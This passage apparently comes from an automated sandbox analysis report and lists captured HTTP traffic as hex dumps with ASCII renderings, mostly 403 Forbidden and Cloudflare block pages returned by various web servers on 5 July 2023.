20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Wed, 05 Jul 2023 06:07:36 GMTserver: Apachecontent-length: 199content-type: text/html; charset=iso-8859-1x-server: coxkitch-svrData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:36 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCache-Control: max-age=15Expires: Wed, 05 Jul 2023 06:07:51 GMTX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CE6q1NHUJRN9arsFITY0fsjyr1znvzlEJLy05N5lW8ZhYVk2ofrEurTpQiRvOvtswgX5yi3KrisNjU8NepXgmvml9%2FamwJ%2FmP%2B3SggiNKgV5J0xeSO%2BKUYAscv07"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7e1d6dbf8b593a4a-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 31 39 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 Data Ascii: 119e<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equi
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:36 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Y4%2BsKFwdVAoOFZmD9SujMHnIih3igPWJQz1etzxJEBujFFHFZ1k8VDCOLNC3LvxICewUn9GBESbCuxnTm7llaLMsgMT%2F5NiFf5zG1gZHyXaIsAOfrr7dDHbPBG4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7e1d6dbfcb021d92-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Cache-Status: Cache-Control: no-storeCache-Control: no-cache, no-store, must-revalidateCache-Control: max-age=0X-Zen-Fury: 32a663237e5bfae651e60bb18d69c8afcd23dfeaServer: ZENEDGEDate: Wed, 05 Jul 2023 06:07:37 GMTData Raw: 32 61 61 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 20 69 66 20 28 74 79 70 65 6f 66 28 5f 5f 5f 7a 65 6e 29 20 3d 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 73 65 74 54 69 6d 65 6f 75 74 28 61 72 67 75 6d 65 6e 74 73 2e 63 61 6c 6c 65 65 2c 20 35 30 29 3b 20 72 65 74 75 72 6e 3b 20 7d 5f 5f 5f 7a 65 6e 2e 68 69 63 28 22 5f 5f 5a 45 48 49 43 36 31 38 33 22 2c 20 31 36 38 38 35 33 37 32 31 39 2c 20 31 2c 20 30 2c 20 36 30 29 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 68 69 63 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 66 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 76 61 72 20 76 20 3d 20 31 36 38 38 35 33 37 31 35 38 20 2a 20 33 2e 31 34 31 35 39 32 36 35 33 35 38 39 38 3b 20 76 20 3d 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 76 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 5f 5f 7a 6a 63 37 31 33 39 3d 22 2b 76 2b 22 3b 20 65 78 70 69 72 65 73 3d 57 65 64 2c 20 30 35 20 4a 75 6c 20 32 30 32 33 20 30 36 3a 30 39 3a 33 37 20 55 54 43 3b 20 70 61 74 68 3d 2f 22 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 2aa<html><head><title>403 Forbidden</title><script type="text/javascript">(function(){ if (typeof(___zen) === "undefined") {setTimeout(arguments.callee, 50); return; }___zen.hic("__ZEHIC6183", 1688537219, 1, 0, 60); })()</script><script type="text/javascript" async="async" src="/__zenedge/assets/hic.js?v=1674207422"></script></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center><script type="text/javascript" async="async" src="/__zenedge/assets/f.js?v=1674207422"></script><script>(function () { var v = 1688537158 * 3.1415926535898; v = Math.floor(v); do
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Jul 2023 06:07:37 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 216X-Sorting-Hat-ShopId: 66042101977Server-Timing: processing;dur=18X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: 41de6e42-c458-4e2d-95ea-0d947bd41cd4CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LjTzL2q49ktb2iv9Dp%2FsEXmW0ltwfIZ5o4Xm3R3SJYEpXgDVVMfyV8kLfEZrrJxd3ejlG1Hpq7V0%2BU%2B89HPNyRmuRfjBVICMqNK1aCINn1jATqkL4WaeGWzKCSCPwXY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=147.000074Server: cloudflareCF-RAY: 7e1d6dc19e5b373f-FRAalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 05 Jul 2023 06:07:37 GMTContent-Type: text/htmlContent-Length: 2843Connection: keep-aliveVary: Accept-EncodingLast-Modified: Thu, 26 Jul 2018 17:13:08 GMTETag: "b1b-571ea1be9f445"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:37 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XRkaVAHGYgZhB9U8KeQBJaHojJ%2FHU7ly7axk0dt3ECt2eexHLN3Z4y2AtxmjJQT3Dx6QDj1qOKSRsjIEihwPl0m0QvDKM8LF%2BKUU%2BNROMnkSfFfu8zazB1esbMsHSzMM"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7e1d6dc4fa451d90-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:37 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=v8KTo%2BrYouMYjGMkDZ%2FILg05hWq%2BxIsvwbpM2ltQ9Kt3oZp0kP5YWt5RT1DYpCzhGR10WjZUUm51HR91mYxKl8gBGFIIN2HZmI21hlk4lT7fJVhAXqRb5TXSNsV3CBIW"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7e1d6dc57ad71d90-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenTransfer-Encoding: chunkedServer: Microsoft-HTTPAPI/2.0Date: Wed, 05 Jul 2023 06:07:31 GMTData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:38 GMTServer: Apache/2.4Content-Length: 318Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:38 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 548Content-Type: text/htmlX-Wix-Request-Id: 1688537258.72229488309310706X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Accept-Ranges: bytesDate: Wed, 05 Jul 2023 06:07:38 GMTX-Served-By: cache-mxp6978-MXPX-Cache: MISSX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,GXNXSWFXisshliUcwO20NQ1aV/eYQaI5OrqNssi0Z4L+nk7+NxPqIX8CxbuBlNVn,qquldgcFrj2n046g4RNSVLeuNqwcdH46iMA2Je1RdMI=Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page 